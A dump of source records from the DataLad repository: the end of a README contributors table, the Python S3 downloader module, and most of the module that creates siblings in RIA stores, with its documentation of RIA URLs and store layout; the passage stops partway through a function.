href=\"https://github.com/vickychenglau\"><img src=\"https://avatars.githubusercontent.com/u/22065437?v=4?s=100\" width=\"100px;\" alt=\"Vicky C Lau\"/><br /><sub><b>Vicky C Lau</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=vickychenglau\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://chris-lamb.co.uk\"><img src=\"https://avatars.githubusercontent.com/u/133209?v=4?s=100\" width=\"100px;\" alt=\"Chris Lamb\"/><br /><sub><b>Chris Lamb</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=lamby\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/asmacdo\"><img src=\"https://avatars.githubusercontent.com/u/1028657?v=4?s=100\" width=\"100px;\" alt=\"Austin Macdonald\"/><br /><sub><b>Austin Macdonald</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=asmacdo\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://nobodyinperson.de\"><img src=\"https://avatars.githubusercontent.com/u/19148271?v=4?s=100\" width=\"100px;\" alt=\"Yann Büchau\"/><br /><sub><b>Yann Büchau</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=nobodyinperson\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/matrss\"><img src=\"https://avatars.githubusercontent.com/u/9308656?v=4?s=100\" width=\"100px;\" alt=\"Matthias Riße\"/><br /><sub><b>Matthias Riße</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=matrss\" title=\"Code\">💻</a></td>\n </tr>\n </tbody>\n</table>\n\n<!-- markdownlint-restore -->\n<!-- prettier-ignore-end -->\n\n<!-- ALL-CONTRIBUTORS-LIST:END -->\n\n[![macstadium](https://uploads-ssl.webflow.com/5ac3c046c82724970fc60918/5c019d917bba312af7553b49_MacStadium-developerlogo.png)](https://www.macstadium.com/)\n\n[Git]: https://git-scm.com\n[Git-annex]: http://git-annex.branchable.com\n[setup.py]: https://github.com/datalad/datalad/blob/master/setup.py\n[NeuroDebian]: http://neuro.debian.net\n[Package Manager Specification]: https://projects.gentoo.org/pms/latest/pms.html\n[enabling the ::science overlay]: https://github.com/gentoo/sci#manual-install-\n\n[DataLad Handbook: Installation]: http://handbook.datalad.org/en/latest/intro/installation.html\n" }, { "alpha_fraction": 0.5682237148284912, "alphanum_fraction": 0.5784879922866821, "avg_line_length": 37.738094329833984, "blob_id": "6ee12bc16733bf13628cfd7f571591b6b4e41595", "content_id": "0258590ae333bb72e71c0375eb64dbe163e0e820", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16270, "license_type": "permissive", "max_line_length": 119, "num_lines": 420, "path": "/datalad/downloaders/s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provide access to Amazon S3 objects.\n\"\"\"\n\nimport re\n\nfrom urllib.parse import urlsplit, unquote as urlunquote\n\nfrom ..utils import (\n auto_repr,\n ensure_dict_from_str,\n)\nfrom ..dochelpers import (\n borrowkwargs,\n)\nfrom ..support.network import (\n get_url_straight_filename,\n iso8601_to_epoch,\n rfc2822_to_epoch,\n)\n\nfrom .base import Authenticator\nfrom .base import BaseDownloader, DownloaderSession\nfrom ..support.exceptions import (\n AccessPermissionExpiredError,\n CapturedException,\n TargetFileAbsent,\n)\nfrom ..support.s3 import (\n Key,\n OrdinaryCallingFormat,\n S3ResponseError,\n boto,\n get_bucket,\n try_multiple_dec_s3,\n)\nfrom ..support.status import FileStatus\n\nimport logging\nfrom logging import getLogger\nlgr = getLogger('datalad.s3')\nboto_lgr = logging.getLogger('boto')\n# not in effect at all, probably those are setup later\n#boto_lgr.handlers = lgr.handlers # Use our handlers\n\n__docformat__ = 'restructuredtext'\n\n\n@auto_repr\nclass S3Authenticator(Authenticator):\n \"\"\"Authenticator for S3 AWS\n \"\"\"\n allows_anonymous = True\n DEFAULT_CREDENTIAL_TYPE = 'aws-s3'\n\n def __init__(self, *args, host=None, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n host: str, optional\n In some cases it is necessary to provide host to connect to. Passed\n to boto.connect_s3\n \"\"\"\n super(S3Authenticator, self).__init__(*args, **kwargs)\n self.connection = None\n self.bucket = None\n self._conn_kwargs = {}\n if host:\n self._conn_kwargs['host'] = host\n\n def authenticate(self, bucket_name, credential, cache=True):\n \"\"\"Authenticates to the specified bucket using provided credentials\n\n Returns\n -------\n bucket\n \"\"\"\n\n if not boto:\n raise RuntimeError(\"%s requires boto module which is N/A\" % self)\n\n # Shut up boto if we do not care to listen ;)\n boto_lgr.setLevel(\n logging.CRITICAL\n if lgr.getEffectiveLevel() > 1\n else logging.DEBUG\n )\n\n # credential might contain 'session' token as well\n # which could be provided as security_token=<token>.,\n # see http://stackoverflow.com/questions/7673840/is-there-a-way-to-create-a-s3-connection-with-a-sessions-token\n conn_kwargs = self._conn_kwargs.copy()\n if bucket_name.lower() != bucket_name:\n # per http://stackoverflow.com/a/19089045/1265472\n conn_kwargs['calling_format'] = OrdinaryCallingFormat()\n\n if credential is not None:\n credentials = credential()\n conn_kind = \"with authentication\"\n conn_args = [credentials['key_id'], credentials['secret_id']]\n conn_kwargs['security_token'] = credentials.get('session')\n else:\n conn_kind = \"anonymously\"\n conn_args = []\n conn_kwargs['anon'] = True\n if '.' in bucket_name:\n conn_kwargs['calling_format'] = OrdinaryCallingFormat()\n\n lgr.info(\n \"S3 session: Connecting to the bucket %s %s\", bucket_name, conn_kind\n )\n self.connection = conn = boto.connect_s3(*conn_args, **conn_kwargs)\n self.bucket = bucket = get_bucket(conn, bucket_name)\n return bucket\n\n\n@auto_repr\nclass S3DownloaderSession(DownloaderSession):\n def __init__(self, size=None, filename=None, url=None, headers=None,\n key=None):\n super(S3DownloaderSession, self).__init__(\n size=size, filename=filename, headers=headers, url=url\n )\n self.key = key\n\n def download(self, f=None, pbar=None, size=None):\n # S3 specific (the rest is common with e.g. http)\n def pbar_callback(downloaded, totalsize):\n assert (totalsize == self.key.size)\n if pbar:\n try:\n pbar.update(downloaded)\n except: # MIH: what does it do? MemoryError?\n pass # do not let pbar spoil our fun\n\n headers = {}\n # report for every % for files > 10MB, otherwise every 10%\n kwargs = dict(headers=headers, cb=pbar_callback,\n num_cb=100 if self.key.size > 10*(1024**2) else 10)\n if size:\n headers['Range'] = 'bytes=0-%d' % (size - 1)\n if f:\n # TODO: May be we could use If-Modified-Since\n # see http://docs.aws.amazon.com/AmazonS3/latest/API/RESTObjectGET.html\n self.key.get_contents_to_file(f, **kwargs)\n else:\n return self.key.get_contents_as_string(encoding=None, **kwargs)\n\n\n@auto_repr\nclass S3Downloader(BaseDownloader):\n \"\"\"Downloader from AWS S3 buckets\n \"\"\"\n\n _DEFAULT_AUTHENTICATOR = S3Authenticator\n\n @borrowkwargs(BaseDownloader)\n def __init__(self, **kwargs):\n super(S3Downloader, self).__init__(**kwargs)\n self._bucket = None\n\n @property\n def bucket(self):\n return self._bucket\n\n def reset(self):\n self._bucket = None\n\n @classmethod\n def _parse_url(cls, url, bucket_only=False):\n \"\"\"Parses s3:// url and returns bucket name, prefix, additional query elements\n as a dict (such as VersionId)\"\"\"\n rec = urlsplit(url)\n if bucket_only:\n return rec.netloc\n assert(rec.scheme == 's3')\n # We are often working with urlencoded URLs so we could safely interact\n # with git-annex via its text based protocol etc. So, if URL looks like\n # it was urlencoded the filepath, we should revert back to an original key\n # name. Since we did not demarcate whether it was urlencoded, we will do\n # magical check, which would fail if someone had % followed by two digits\n filepath = rec.path.lstrip('/')\n if re.search('%[0-9a-fA-F]{2}', filepath):\n lgr.debug(\"URL unquoting S3 URL filepath %s\", filepath)\n filepath = urlunquote(filepath)\n # TODO: needs replacement to ensure_ since it doesn't\n # deal with non key=value\n return rec.netloc, filepath, ensure_dict_from_str(rec.query, sep='&') or {}\n\n def _establish_session(self, url, allow_old=True):\n \"\"\"\n\n Parameters\n ----------\n allow_old: bool, optional\n If a Downloader allows for persistent sessions by some means -- flag\n instructs whether to use previous session, or establish a new one\n\n Returns\n -------\n bool\n To state if old instance of a session/authentication was used\n \"\"\"\n bucket_name = self._parse_url(url, bucket_only=True)\n if allow_old and self._bucket:\n if self._bucket.name == bucket_name:\n try:\n self._check_credential()\n lgr.debug(\n \"S3 session: Reusing previous connection to bucket %s\",\n bucket_name\n )\n return True # we used old\n except AccessPermissionExpiredError:\n lgr.debug(\"S3 session: credential expired\")\n else:\n lgr.warning(\"No support yet for multiple buckets per S3Downloader\")\n\n lgr.debug(\"S3 session: Reconnecting to the bucket\")\n self._bucket = try_multiple_dec_s3(self.authenticator.authenticate)(\n bucket_name, self.credential)\n return False\n\n def _check_credential(self):\n \"\"\"Quick check of the credential if known on either it has not expired\n\n Raises\n ------\n AccessPermissionExpiredError\n if credential is found to be expired\n \"\"\"\n if self.credential and self.credential.is_expired:\n raise AccessPermissionExpiredError(\n \"Credential %s has expired\" % self.credential)\n\n def _get_key(self, key_name, version_id=None, headers=None):\n try:\n return self._bucket.get_key(key_name, version_id=version_id, headers=headers)\n except S3ResponseError as e:\n if e.status != 400:\n raise # we will not deal with those here\n # e.g. 400 Bad request could happen due to timed out key.\n # Since likely things went bad if credential expired, just raise general\n # AccessDeniedError. Logic upstream should retry\n self._check_credential()\n ce1 = CapturedException(e)\n lgr.debug(\"bucket.get_key (HEAD) failed with %s, trying GET request now\",\n ce1)\n try:\n return self._get_key_via_get(key_name, version_id=version_id, headers=headers)\n except S3ResponseError:\n # propagate S3 exceptions since they actually can provide the reason why we failed!\n raise\n except Exception as e2:\n ce2 = CapturedException(e2)\n lgr.debug(\"We failed to get a key via HEAD due to %s and then via partial GET due to %s\",\n ce1, ce2)\n # reraise original one\n raise e\n\n def _get_key_via_get(self, key_name, version_id=None, headers=None):\n \"\"\"Get key information via GET so we can get error_code if any\n\n The problem with bucket.get_key is that it uses HEAD request.\n With that request response header has only the status (e.g. 400)\n but not a specific error_code. That makes it impossible to properly\n react on failed requests (wait? re-auth?).\n\n Yarik found no easy way in boto to reissue the request with GET,\n so this code is lobotomized version of _get_key_internal but with GET\n instead of HEAD and thus providing body into error handling.\n \"\"\"\n query_args_l = []\n if version_id:\n query_args_l.append('versionId=%s' % version_id)\n query_args = '&'.join(query_args_l) or None\n bucket = self._bucket\n headers = headers or {}\n headers['Range'] = 'bytes=0-0'\n response = bucket.connection.make_request(\n 'GET',\n bucket.name,\n key_name,\n headers=headers,\n query_args=query_args)\n body = response.read()\n if response.status // 100 == 2:\n # it was all good\n k = bucket.key_class(bucket)\n provider = bucket.connection.provider\n k.metadata = boto.utils.get_aws_metadata(response.msg, provider)\n for field in Key.base_fields:\n k.__dict__[field.lower().replace('-', '_')] = \\\n response.getheader(field)\n crange, crange_size = response.getheader('content-range'), None\n if crange:\n # should look like 'bytes 0-0/50993'\n if not crange.startswith('bytes 0-0/'):\n # we will just spit out original exception and be done -- we have tried!\n raise ValueError(\"Got content-range %s which I do not know how to handle to \"\n \"get the full size\" % repr(crange))\n crange_size = int(crange.split('/', 1)[-1])\n k.size = crange_size\n # the following machinations are a workaround to the fact that\n # apache/fastcgi omits the content-length header on HEAD\n # requests when the content-length is zero.\n # See http://goo.gl/0Tdax for more details.\n if response.status != 206: # partial content\n # assume full return of 0 bytes etc\n clen_size = int(response.getheader('content-length'), 0)\n\n if crange_size is not None:\n if crange_size != clen_size:\n raise ValueError(\n \"We got content-length %d and size from content-range %d - they do \"\n \"not match\", clen_size, crange_size)\n k.size = clen_size\n k.name = key_name\n k.handle_version_headers(response)\n k.handle_encryption_headers(response)\n k.handle_restore_headers(response)\n k.handle_storage_class_header(response)\n k.handle_addl_headers(response.getheaders())\n return k\n else:\n if response.status == 404:\n return None\n else:\n raise bucket.connection.provider.storage_response_error(\n response.status, response.reason, body)\n\n def get_downloader_session(self, url, **kwargs):\n bucket_name, url_filepath, params = self._parse_url(url)\n if params:\n newkeys = set(params.keys()) - {'versionId'}\n if newkeys:\n raise NotImplementedError(\"Did not implement support for %s\" % newkeys)\n assert(self._bucket.name == bucket_name) # must be the same\n\n self._check_credential()\n try:\n key = try_multiple_dec_s3(self._get_key)(\n url_filepath, version_id=params.get('versionId', None)\n )\n except S3ResponseError as e:\n raise TargetFileAbsent(\"S3 refused to provide the key for %s from url %s\"\n % (url_filepath, url)) from e\n if key is None:\n raise TargetFileAbsent(\"No key returned for %s from url %s\" % (url_filepath, url))\n\n target_size = key.size # S3 specific\n headers = {\n 'Content-Length': key.size,\n 'Content-Disposition': key.name\n }\n\n if key.last_modified:\n headers['Last-Modified'] = rfc2822_to_epoch(key.last_modified)\n\n # Consult about filename\n url_filename = get_url_straight_filename(url)\n\n if 'versionId' not in params and key.version_id:\n # boto adds version_id to the request if it is known present.\n # It is a good idea in general to avoid race between moment of retrieving\n # the key information and actual download.\n # But depending on permissions, we might be unable (like in the case with NDA)\n # to download a guaranteed version of the key.\n # So we will just download the latest version (if still there)\n # if no versionId was specified in URL\n # Alternative would be to make this a generator and generate sessions\n # but also remember if the first download succeeded so we do not try\n # again to get versioned one first.\n key.version_id = None\n # TODO: ask NDA to allow download of specific versionId?\n\n return S3DownloaderSession(\n size=target_size,\n filename=url_filename,\n url=url,\n headers=headers,\n key=key\n )\n\n @classmethod\n def get_key_headers(cls, key, dateformat='rfc2822'):\n headers = {\n 'Content-Length': key.size,\n 'Content-Disposition': key.name\n }\n\n if key.last_modified:\n # boto would return time string the way amazon returns which returns\n # it in two different ones depending on how key information was obtained:\n # https://github.com/boto/boto/issues/466\n headers['Last-Modified'] = {'rfc2822': rfc2822_to_epoch,\n 'iso8601': iso8601_to_epoch}[dateformat](key.last_modified)\n return headers\n\n @classmethod\n def get_status_from_headers(cls, headers):\n # TODO: duplicated with http functionality\n # convert to FileStatus\n return FileStatus(\n size=headers.get('Content-Length'),\n mtime=headers.get('Last-Modified'),\n filename=headers.get('Content-Disposition')\n )\n\n @classmethod\n def get_key_status(cls, key, dateformat='rfc2822'):\n return cls.get_status_from_headers(cls.get_key_headers(key, dateformat=dateformat))\n" }, { "alpha_fraction": 0.5736953616142273, "alphanum_fraction": 0.5755224823951721, "avg_line_length": 39.409324645996094, "blob_id": "6e6370a565485c14235ce1f1db377ac36e917364", "content_id": "15ccd2df63a02826a8df71fd564a4b70cc3a1f44", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31196, "license_type": "permissive", "max_line_length": 92, "num_lines": 772, "path": "/datalad/distributed/create_sibling_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Create a sibling in a RIA store\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom pathlib import PurePosixPath as UrlPath\n\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.core.distributed.clone import decode_source_spec\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n verify_ria_url,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n RemoteCommandFailedError,\n RIARemoteError,\n SSHRemoteIO,\n)\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.distribution.utils import _yield_ds_w_matching_siblings\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.log import log_progress\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import url_path2local_path\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n Path,\n quote_cmdlinearg,\n)\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_ria')\n\n\n@build_doc\nclass CreateSiblingRia(Interface):\n \"\"\"Creates a sibling to a dataset in a RIA store\n\n Communication with a dataset in a RIA store is implemented via two\n siblings. A regular Git remote (repository sibling) and a git-annex\n special remote for data transfer (storage sibling) -- with the former\n having a publication dependency on the latter. By default, the name of the\n storage sibling is derived from the repository sibling's name by appending\n \"-storage\".\n\n The store's base path is expected to not exist, be an empty directory,\n or a valid RIA store.\n\n Notes\n -----\n\n\n **RIA URL format**\n\n Interactions with new or existing RIA stores require RIA URLs to identify\n the store or specific datasets inside of it.\n\n The general structure of a RIA URL pointing to a store takes the form\n ``ria+[scheme]://<storelocation>`` (e.g.,\n ``ria+ssh://[user@]hostname:/absolute/path/to/ria-store``, or\n ``ria+file:///absolute/path/to/ria-store``)\n\n The general structure of a RIA URL pointing to a dataset in a store (for\n example for cloning) takes a similar form, but appends either the datasets\n UUID or a \"~\" symbol followed by the dataset's alias name:\n ``ria+[scheme]://<storelocation>#<dataset-UUID>`` or\n ``ria+[scheme]://<storelocation>#~<aliasname>``.\n In addition, specific version identifiers can be appended to the URL with an\n additional \"@\" symbol:\n ``ria+[scheme]://<storelocation>#<dataset-UUID>@<dataset-version>``,\n where ``dataset-version`` refers to a branch or tag.\n\n\n **RIA store layout**\n\n A RIA store is a directory tree with a dedicated subdirectory for each\n dataset in the store. The subdirectory name is constructed from the\n DataLad dataset ID, e.g. ``124/68afe-59ec-11ea-93d7-f0d5bf7b5561``, where\n the first three characters of the ID are used for an intermediate\n subdirectory in order to mitigate files system limitations for stores\n containing a large number of datasets.\n\n By default, a dataset in a RIA store consists of two components:\n A Git repository (for all dataset contents stored in Git) and a\n storage sibling (for dataset content stored in git-annex).\n\n It is possible to selectively disable either component using\n ``storage-sibling 'off'`` or ``storage-sibling 'only'``, respectively.\n If neither component is disabled, a dataset's subdirectory layout in a RIA\n store contains a standard bare Git repository and an ``annex/`` subdirectory\n inside of it.\n The latter holds a Git-annex object store and comprises the storage sibling.\n Disabling the standard git-remote (``storage-sibling='only'``) will result\n in not having the bare git repository, disabling the storage sibling\n (``storage-sibling='off'``) will result in not having the ``annex/``\n subdirectory.\n\n Optionally, there can be a further subdirectory ``archives`` with\n (compressed) 7z archives of annex objects. The storage remote is able to\n pull annex objects from these archives, if it cannot find in the regular\n annex object store. This feature can be useful for storing large\n collections of rarely changing data on systems that limit the number of\n files that can be stored.\n\n Each dataset directory also contains a ``ria-layout-version`` file that\n identifies the data organization (as, for example, described above).\n\n Lastly, there is a global ``ria-layout-version`` file at the store's\n base path that identifies where dataset subdirectories themselves are\n located. At present, this file must contain a single line stating the\n version (currently \"1\"). This line MUST end with a newline character.\n\n It is possible to define an alias for an individual dataset in a store by\n placing a symlink to the dataset location into an ``alias/`` directory\n in the root of the store. This enables dataset access via URLs of format:\n ``ria+<protocol>://<storelocation>#~<aliasname>``.\n\n Compared to standard git-annex object stores, the ``annex/`` subdirectories\n used as storage siblings follow a different layout naming scheme\n ('dirhashmixed' instead of 'dirhashlower').\n This is mostly noted as a technical detail, but also serves to remind\n git-annex powerusers to refrain from running git-annex commands\n directly in-store as it can cause severe damage due to the layout\n difference. Interactions should be handled via the ORA special remote\n instead.\n\n\n **Error logging**\n\n To enable error logging at the remote end, append a pipe symbol and an \"l\"\n to the version number in ria-layout-version (like so: ``1|l\\\\n``).\n\n Error logging will create files in an \"error_log\" directory whenever the\n git-annex special remote (storage sibling) raises an exception, storing the\n Python traceback of it. The logfiles are named according to the scheme\n ``<dataset id>.<annex uuid of the remote>.log`` showing \"who\" ran into this\n issue with which dataset. Because logging can potentially leak personal\n data (like local file paths for example), it can be disabled client-side\n by setting the configuration variable\n ``annex.ora-remote.<storage-sibling-name>.ignore-remote-config``.\n \"\"\"\n\n # TODO: description?\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to process. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n url=Parameter(\n args=(\"url\",),\n metavar=\"ria+<ssh|file|http(s)>://<host>[/path]\",\n doc=\"\"\"URL identifying the target RIA store and access protocol. If\n ``push_url||--push-url`` is given in addition, this is\n used for read access only. Otherwise it will be used for write\n access too and to create the repository sibling in the RIA store.\n Note, that HTTP(S) currently is valid for consumption only thus\n requiring to provide ``push_url||--push-url``.\n \"\"\",\n constraints=EnsureStr() | EnsureNone()),\n push_url=Parameter(\n args=(\"--push-url\",),\n metavar=\"ria+<ssh|file>://<host>[/path]\",\n doc=\"\"\"URL identifying the target RIA store and access protocol for\n write access to the storage sibling. If given this will also be used\n for creation of the repository sibling in the RIA store.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"Name of the sibling.\n With `recursive`, the same name will be used to label all\n the subdatasets' siblings.\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n required=True),\n storage_name=Parameter(\n args=(\"--storage-name\",),\n metavar=\"NAME\",\n doc=\"\"\"Name of the storage sibling (git-annex special remote).\n Must not be identical to the sibling name. If not specified,\n defaults to the sibling name plus '-storage' suffix. If only\n a storage sibling is created, this setting is ignored, and\n the primary sibling name is used.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n alias=Parameter(\n args=('--alias',),\n metavar='ALIAS',\n doc=\"\"\"Alias for the dataset in the RIA store.\n Add the necessary symlink so that this dataset can be cloned from the RIA\n store using the given ALIAS instead of its ID.\n With `recursive=True`, only the top dataset will be aliased.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n post_update_hook=Parameter(\n args=(\"--post-update-hook\",),\n doc=\"\"\"Enable Git's default post-update-hook for the created\n sibling. This is useful when the sibling is made accessible via a\n \"dumb server\" that requires running 'git update-server-info'\n to let Git interact properly with it.\"\"\",\n action=\"store_true\"),\n shared=Parameter(\n args=(\"--shared\",),\n metavar='{false|true|umask|group|all|world|everybody|0xxx}',\n doc=\"\"\"If given, configures the permissions in the\n RIA store for multi-users access.\n Possible values for this option are identical to those of\n `git init --shared` and are described in its documentation.\"\"\",\n constraints=EnsureStr() | EnsureBool() | EnsureNone()),\n group=Parameter(\n args=(\"--group\",),\n metavar=\"GROUP\",\n doc=\"\"\"Filesystem group for the repository. Specifying the group is\n crucial when [CMD: --shared=group CMD][PY: shared=\"group\" PY]\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n storage_sibling=Parameter(\n args=(\"--storage-sibling\",),\n dest='storage_sibling',\n metavar='MODE',\n constraints=EnsureChoice('only') | EnsureBool() | EnsureNone(),\n doc=\"\"\"By default, an ORA storage sibling and a Git repository\n sibling are created ([CMD: on CMD][PY: True|'on' PY]).\n Alternatively, creation of the storage sibling can be disabled\n ([CMD: off CMD][PY: False|'off' PY]), or a storage sibling\n created only and no Git sibling\n ([CMD: only CMD][PY: 'only' PY]). In the latter mode, no Git\n installation is required on the target host.\"\"\"),\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice('skip', 'error', 'reconfigure'),\n metavar='MODE',\n doc=\"\"\"Action to perform, if a (storage) sibling is already\n configured under the given name and/or a target already exists.\n In this case, a dataset can be skipped ('skip'), an existing target\n repository be forcefully re-initialized, and the sibling\n (re-)configured ('reconfigure'), or the command be instructed to\n fail ('error').\"\"\", ),\n new_store_ok=Parameter(\n args=(\"--new-store-ok\",),\n action='store_true',\n doc=\"\"\"When set, a new store will be created, if necessary. Otherwise, a sibling\n will only be created if the url points to an existing RIA store.\"\"\",\n ),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n trust_level=Parameter(\n args=(\"--trust-level\",),\n metavar=\"TRUST-LEVEL\",\n constraints=EnsureChoice('trust', 'semitrust', 'untrust', None),\n doc=\"\"\"specify a trust level for the storage sibling. If not\n specified, the default git-annex trust level is used. 'trust'\n should be used with care (see the git-annex-trust man page).\"\"\",),\n disable_storage__=Parameter(\n args=(\"--no-storage-sibling\",),\n dest='disable_storage__',\n doc=\"\"\"This option is deprecated. Use '--storage-sibling off'\n instead.\"\"\",\n action=\"store_false\"),\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling_ria')\n @eval_results\n def __call__(url,\n name,\n *, # note that `name` is required but not posarg in CLI\n dataset=None,\n storage_name=None,\n alias=None,\n post_update_hook=False,\n shared=None,\n group=None,\n storage_sibling=True,\n existing='error',\n new_store_ok=False,\n trust_level=None,\n recursive=False,\n recursion_limit=None,\n disable_storage__=None,\n push_url=None\n ):\n if disable_storage__ is not None:\n import warnings\n warnings.warn(\"datalad-create-sibling-ria --no-storage-sibling \"\n \"is deprecated, use --storage-sibling off instead.\",\n DeprecationWarning)\n # recode to new setup\n disable_storage__ = None\n storage_sibling = False\n\n if storage_sibling == 'only' and storage_name:\n lgr.warning(\n \"Sibling name will be used for storage sibling in \"\n \"storage-sibling-only mode, but a storage sibling name \"\n \"was provided\"\n )\n\n ds = require_dataset(\n dataset, check_installed=True, purpose='create RIA sibling(s)')\n res_kwargs = dict(\n ds=ds,\n action=\"create-sibling-ria\",\n logger=lgr,\n )\n\n # parse target URL\n # Note: URL parsing is done twice ATM (for top-level ds). This can't be\n # reduced to single instance, since rewriting url based on config could\n # be different for subdatasets.\n try:\n ssh_host, url_base_path, rewritten_url = \\\n verify_ria_url(push_url if push_url else url, ds.config)\n except ValueError as e:\n yield get_status_dict(\n status='error',\n message=str(e),\n **res_kwargs\n )\n return\n\n local_base_path = Path(url_path2local_path(url_base_path))\n\n if ds.repo.get_hexsha() is None or ds.id is None:\n raise RuntimeError(\n \"Repository at {} is not a DataLad dataset, \"\n \"run 'datalad create [--force]' first.\".format(ds.path))\n\n if not storage_sibling and storage_name:\n lgr.warning(\n \"Storage sibling setup disabled, but a storage sibling name \"\n \"was provided\"\n )\n\n if storage_sibling and not storage_name:\n storage_name = \"{}-storage\".format(name)\n\n if storage_sibling and name == storage_name:\n # leads to unresolvable, circular dependency with publish-depends\n raise ValueError(\"sibling names must not be equal\")\n\n if not isinstance(url, str):\n raise TypeError(\"url is not a string, but %s\" % type(url))\n\n # Query existing siblings upfront in order to fail early on\n # existing=='error', since misconfiguration (particularly of special\n # remotes) only to fail in a subdataset later on with that config, can\n # be quite painful.\n # TODO: messages - this is \"create-sibling\". Don't confuse existence of\n # local remotes with existence of the actual remote sibling\n # in wording\n if existing == 'error':\n failed = False\n for dpath, sname in _yield_ds_w_matching_siblings(\n ds,\n (name, storage_name),\n recursive=recursive,\n recursion_limit=recursion_limit):\n res = get_status_dict(\n status='error',\n message=(\n \"a sibling %r is already configured in dataset %r\",\n sname, dpath),\n type='sibling',\n name=sname,\n **res_kwargs,\n )\n failed = True\n yield res\n if failed:\n return\n # TODO: - URL parsing + store creation needs to be RF'ed based on\n # command abstractions\n # - more generally consider store creation a dedicated command or\n # option\n\n io = SSHRemoteIO(ssh_host) if ssh_host else LocalIO()\n try:\n # determine the existence of a store by trying to read its layout.\n # Because this raises a FileNotFound error if non-existent, we need\n # to catch it\n io.read_file(local_base_path / 'ria-layout-version')\n except (FileNotFoundError, RIARemoteError, RemoteCommandFailedError) as e:\n if not new_store_ok:\n # we're instructed to only act in case of an existing RIA store\n res = get_status_dict(\n status='error',\n message=\"No store found at '{}'. Forgot \"\n \"--new-store-ok ?\".format(local_base_path),\n **res_kwargs)\n yield res\n return\n\n log_progress(\n lgr.info, 'create-sibling-ria',\n 'Creating a new RIA store at %s', local_base_path,\n )\n create_store(io, local_base_path, '1')\n\n yield from _create_sibling_ria(\n ds,\n url,\n push_url,\n name,\n storage_sibling,\n storage_name,\n alias,\n existing,\n shared,\n group,\n post_update_hook,\n trust_level,\n res_kwargs)\n\n if recursive:\n # Note: subdatasets can be treated independently, so go full\n # recursion when querying for them and _no_recursion with the\n # actual call. Theoretically this can be parallelized.\n\n for subds in ds.subdatasets(state='present',\n recursive=True,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled',\n result_xfm='datasets'):\n yield from _create_sibling_ria(\n subds,\n url,\n push_url,\n name,\n storage_sibling,\n storage_name,\n None, # subdatasets can't have the same alias as the parent\n existing,\n shared,\n group,\n post_update_hook,\n trust_level,\n res_kwargs)\n\n\ndef _create_sibling_ria(\n ds,\n url,\n push_url,\n name,\n storage_sibling,\n storage_name,\n alias,\n existing,\n shared,\n group,\n post_update_hook,\n trust_level,\n res_kwargs):\n # be safe across datasets\n res_kwargs = res_kwargs.copy()\n # update dataset\n res_kwargs['ds'] = ds\n\n if not isinstance(ds.repo, AnnexRepo):\n # No point in dealing with a special remote when there's no annex.\n # Note, that in recursive invocations this might only apply to some of\n # the datasets. Therefore dealing with it here rather than one level up.\n lgr.debug(\"No annex at %s. Ignoring special remote options.\", ds.path)\n storage_sibling = False\n storage_name = None\n\n # 